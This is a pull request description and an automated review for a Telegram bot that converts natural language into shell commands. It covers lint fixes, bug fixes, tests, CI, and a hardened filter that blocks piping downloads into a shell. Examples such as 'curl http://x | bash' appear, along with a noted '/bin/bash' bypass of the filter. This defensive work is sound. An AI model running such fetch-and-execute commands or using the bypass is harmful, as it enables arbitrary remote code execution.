Polish pass: lint, safety hardening, packaging, tests, CI

[Peterc3-dev]

Hygiene-only polish pass on the Python sources. No new product features, no benchmarks, no behavior changes to command routing beyond the bug fixes noted below.

Verified locally

• ruff check . — clean (0 issues). Started from 4 findings (3 unused imports, 1 placeholderless f-string), all auto-fixed.
• pytest -q — 46 passed. Tests cover pure logic only and import no heavy/runtime-only deps (no telegram, httpx, GPU, or model weights):
  • command_parser: intent detection + NL→shell building + file-create extraction
  • shell_ghost: is_safe / needs_confirmation classification and create_file (against a tmp dir; execute() is never run, audit log monkeypatched)
  • memory: JSON store round-trips, history trimming, corrupt-file recovery (paths isolated via monkeypatch/tmp_path)
• Pure modules import cleanly under a tmp CIN_DATA_DIR.

NOT verified (out of scope / no environment)

• The Telegram bot itself (telegram_bot.py) was not executed or imported — it needs python-telegram-bot + httpx and a live bot token / Ollama / network. Reviewed by reading only.
• Ollama and Anthropic-fallback code paths are untouched and unexercised.
• install.sh and the systemd unit were not run (need root + apt).

Changes

Lint

• Remove unused imports (asyncio, datetime.datetime, typing.Optional); drop one placeholderless f-string.

Bug fixes

• command_parser git passthrough no longer lowercases arguments — it now captures from the original case-preserving string, so branch names / commit messages survive (e.g. git commit -m AddFeatureX previously became addfeaturex).
• telegram_bot creates DATA_DIR before logging.basicConfig opens bot.log, fixing a FileNotFoundError at import time when the dir doesn't exist yet.

Safety hardening (security-relevant tooling)

• shell_ghost.is_safe now blocks piping into a shell interpreter regardless of intervening text/whitespace (e.g. curl http://x | bash). The literal DANGEROUS_PATTERNS entries only matched the exact curl | bash spacing and let real commands through. This strictly reduces what can run — no new capability.

Hardcoded path

• install.sh env template no longer ships a literal /home/YOUR_USER path; the data dir is resolved from the bot user's actual home at install time.

Packaging

• Add requirements.txt (python-telegram-bot, httpx — the only third-party imports) and a minimal pyproject.toml.

Tests + CI

• New tests/ (46 tests, pure-logic only).
• .github/workflows/ci.yml: ruff + pytest on Python 3.11/3.12, installing only ruff+pytest (no heavy runtime deps); pytest scoped to ./tests. Green-able without GPUs/models.

Documented (not changed)

• TODO left in command_parser: the leading do in the execute pattern over-matches conversational phrases like "do you remember my name?" (routes to command instead of chat). Left as-is to avoid altering routing in a hygiene pass.

🤖 Generated with Claude Code

[Peterc3-dev]

Independent verification — verdict: solid ✅

Reviewed adversarially on a clean clone (fresh venv, only ruff+pytest installed — telegram/httpx/torch deliberately absent to mirror CI).

Claims confirmed

• ruff check . → All checks passed! (exit 0).
• pytest -q tests → 46 passed. Matches the body exactly.
• "Started from 4 findings" verified: ruff --select F on origin/main reports exactly 4 (3 unused imports + 1 placeholderless f-string).

CI is genuinely green-able without GPUs/models (the common trap this avoids)

• Even bare pytest (no args) collects only the 46 tests in tests/ because testpaths = ["tests"] scopes collection. telegram_bot.py (which imports httpx/telegram) is never imported during collection — confirmed it raises ModuleNotFoundError on direct import while the suite still passes clean. The workflow installs only ruff pytest. No torch/model import path is reachable.

Bug fixes behave as described

• git passthrough preserves case: git commit -m AddFeatureX → git commit -m AddFeatureX (no lowercasing).
• DATA_DIR.mkdir() (line 40) runs before logging.basicConfig/FileHandler (lines 42/46) — FileNotFoundError-at-import fix is correctly ordered.
• _PIPE_TO_SHELL blocks curl http://x | bash, wget … |sh, … | zsh; correctly does NOT over-block bashx/bashful_script (\b anchored).

No secrets / hardcoded paths: scan clean; install.sh resolves the data dir from the bot user's home via getent instead of shipping /home/YOUR_USER.

Minor (non-blocking, not a regression): _PIPE_TO_SHELL doesn't catch a path-qualified interpreter, e.g. echo | /bin/bash (matches | <name> only). The PR honestly frames this as "strictly reduces what can run," not bypass-proof — and the downstream whitelist still governs the base command. Worth a follow-up to also match |\s*\S*/(bash|sh|…), but out of scope for a hygiene pass.

No overclaims in the body; the "NOT verified" section is candid and accurate. LGTM.

— automated independent review